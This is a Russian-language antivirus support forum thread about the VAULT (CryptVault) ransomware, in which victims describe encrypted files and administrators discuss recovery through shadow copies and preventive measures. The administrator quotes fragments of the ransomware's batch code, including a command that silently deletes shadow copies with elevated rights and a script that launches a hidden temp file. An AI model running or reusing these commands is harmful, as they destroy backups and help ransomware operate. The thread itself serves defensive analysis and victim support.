Вход
Поиск  Пользователи  Правила  Войти
Центр вирусных исследований и аналитики Шифровальщики файлов и подбор дешифраторов

файлы зашифрованы с расширением .vault , bat encoder /CryptVault

RSS
 
Дмитрий Морозов
Дмитрий Морозов
Пользователь
Сообщений: 11
Баллов: 5
Регистрация: 19.02.2015
Размещено 19.02.2015 20:27:57
Зашифровались файлы с расшрирением  doc. и так далее. Cтали с расширением, например doc.vault. При загрузке компа выскакивает окно с ссылкой на сайт злоумышленников. Плз. помогите.

Ответы

Пред. 1 ... 45 46 47 48 49 След.
 
Оксана Дубовицкая
Оксана Дубовицкая
Пользователь
Сообщений: 10
Баллов: 5
Регистрация: 19.08.2015
Размещено 21.08.2015 17:15:09
Цитата
santy написал:
pubring.gpg обычно не перезаписывается мусором, и не удаляется.
а вот secring.gpg по алгоритму прежде чем удалить, забивают полезную инфу мусором.
Ладно, пойду узнаю сколько стоит это все восстановить....
 
santy
santy
Администратор
Сообщений: 17928
Баллов: 28684
Регистрация: 16.03.2010
Размещено 24.08.2015 17:10:01
по мотивам беседы с Оксаной.

Ищут пожарные, ищет милиция...Ищут давно, Но не могут найти..." (с), С.Маршак.

Очередная активность вулкана по имени ВАУЛТ вновь накрыла своей электронной волной беспечных пользователей, которые уютно устроились у монитора, принимая извергаемый сетевой "пепел" за манну небесную.

восстановить утраченные в результате внезапной атаки (а так же отсутствия архивных и теневых копий) файлы крайне сложно, во-первых, в силу их шифрования, во-вторых, тщательной зачистки оригинальных документов после удаления.

для проверки возможности восстановления удаленных документов после завершения процесса шифрования использовались несколько инструментов:

getdataback,
r-studio,
ontrack easy recovery,
hetman partition recovery,
testdisk,
winhex

для теста использовались несколько папок с документами:
doc, xls, pdf, jpg, rtf, txt, rar

не ставил цели сравнить данные инструменты, кто лучше, быстрее и больше восстановит документов.
надо было просто посмотреть что подобные инструменты могут что-то восстановить после целенаправленного шифрования и удаления документов.
В случае с ВАУЛТОМ цель не достигнута. документов восстановлено минимальное количество, а след секретного ключа (secring.gpg) не найден.

поиски в winhex по известным hex (9501D804558F43D6010400BA49F79C06, 9501D804558F3209010400BE8B3CB164, 9501D80455A4EE32010400B53F95F674), и символьным (-----BEGIN PGP PRIVATE KEY BLOCK-----,-----END PGP PRIVATE KEY BLOCK-----) сигнатурам не дали результат.

отсюда вывод: надежда на восстановление документов специализированными инструментами крайне мала, после того как "их санкции порвали в клочья нашу экономику"

отсюда другая надежда: на превентивную защиту от запуска шифраторов. например, Cryptoprevent, а так же на создание защищенных разделов для документов с помощью HIPS.

(с), chklst.ru
Изменено: santy - 04.06.2016 18:07:56
[ Как создать образ автозапуска? ]
 
Виктор Соколин
Виктор Соколин
Пользователь
Сообщений: 1
Регистрация: 24.08.2015
Размещено 24.08.2015 23:06:24
Доброй ночи!

Схватил VAULT 21.08.15г  с письмом на mail.с архивом ZIP ,типо с счетом . испробовал все!!  В итоге воспользовался  восстановкой потерянных данных :Компьютер- Рабочий Стол- папка с доками- восстаовить прежнюю версию.  Воссстановилось все!  Все работает . Дублирующие файлы формата VAULT  отсортировал по типу и удалил.
 
Валентин
Валентин
Администратор
Сообщений: 5156
Баллов: 8258
Регистрация: 12.05.2010
Размещено 25.08.2015 12:56:43
Виктор, поздравляю, зачастую, точки восстановления тоже затираются, так что Вам повезло   :)
ESET Technical Support
 
Константин Гончаров
Константин Гончаров
Пользователь
Сообщений: 1
Регистрация: 31.08.2015
Размещено 31.08.2015 15:50:24
Добрый день! К сожалению, столкнулся с такой же незадачей: сотрудница запустила вирус на своей машине и "зашифровала", естественно крайне важную и необходимую, информацию. По дате отобрал файлы, какие смог найти на компьютере. Отправил на почту santy, указанную выше. Буду очень признателен, если найдется время проверить архив и возможность восстановления информации. Заранее спасибо!
 
santy
santy
Администратор
Сообщений: 17928
Баллов: 28684
Регистрация: 16.03.2010
Размещено 01.09.2015 05:35:30
Константин Гончаров,
ответил в почту.
опыт показывает за последние полтора года, что пост_реакция часто не успевает за новым ходом мошенников, потому надо  перестраивать работу в направлении реализации превентивных мер: настройка локальных политик, создание правил ХИПС, регулярного создания архивных и теневых копий документов, доведения до пользователей меры опасности при работе в сети с электронной почтой и браузерами.
Изменено: santy - 04.06.2016 17:32:48
[ Как создать образ автозапуска? ]
 
Станислав Перевозников
Станислав Перевозников
Пользователь
Сообщений: 3
Баллов: 1
Регистрация: 28.10.2015
Размещено 28.10.2015 13:54:09
Добрый день!
На работе словли эту напасть. Обидно, что за два дня до этого активировали купленную лицензию на SMART SECURITY, в замен Каспера (который, если верить сети, эту гадость ловит:(). Маил письмо пропустил, хотя попытку переслать это письмо мне пресек. Антивирус тоже сфилонил.

Шифратор отработал, ключ потер. Но теневые копии нашлись через ShadowExplorer (хотя в свойствах файлов Предыдущих версий уже не было) - спасибо Вам за наводку.

Посмотрел отчет, как отработал Esset (скрин прилагаю) - отловил KillBackup, Filecoder, Runner.BC (ну, хоть за это большое спасибо ему). Хотя непонятно, он его отловил, но как-то частично - более 15 000 документов и картинок зашифровано, ключ потерт. Фото тер по непонятному принципу - т.е. потер, но не все.  
EssetSS8.png (163.36 КБ)
Изменено: Станислав Перевозников - 04.06.2016 18:07:56
 
santy
santy
Администратор
Сообщений: 17928
Баллов: 28684
Регистрация: 16.03.2010
Размещено 28.10.2015 14:50:33
Станислав,
если не трудно, добавьте лог журнала обнаружения угроз.
судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились

судя по коду шифратора так и есть.
Код
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\59665d79.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\59665d79.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\59665d79.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\59665d79.vbs"
Изменено: santy - 04.06.2016 18:07:56
[ Как создать образ автозапуска? ]
 
Станислав Перевозников
Станислав Перевозников
Пользователь
Сообщений: 3
Баллов: 1
Регистрация: 28.10.2015
Размещено 28.10.2015 14:56:14
Цитата
santy написал:
Станислав,
если не трудно, добавьте  лог журнала обнаружения угроз.
судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились

Но, частично он их испортил - тк в свойствах документа версий не было, только через прогу нашлись.
Изменено: Станислав Перевозников - 04.06.2016 18:07:56
 
santy
santy
Администратор
Сообщений: 17928
Баллов: 28684
Регистрация: 16.03.2010
Размещено 28.10.2015 15:10:09
27.10.2015 11:15:29 Защита в режиме реального времени файл C:\Users\23\AppData\Local\Temp\27ddf88e.js BAT/Filecoder.AG троянская программа очищен удалением - изолирован 23-ПК\23 Событие произошло в новом файле, созданном следующим приложением: C:\Windows\System32\cmd.exe.

Цитата
echo var cdp="%%TEMP%%\\05542988.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\27ddf88e.js"

этот скриптик, скорее всего уже после запуска был удален. здесь удаление файла не повлияло на процесс шифрования.
Изменено: santy - 04.06.2016 18:08:54
[ Как создать образ автозапуска? ]
 
Пред. 1 ... 45 46 47 48 49 След.
Читают тему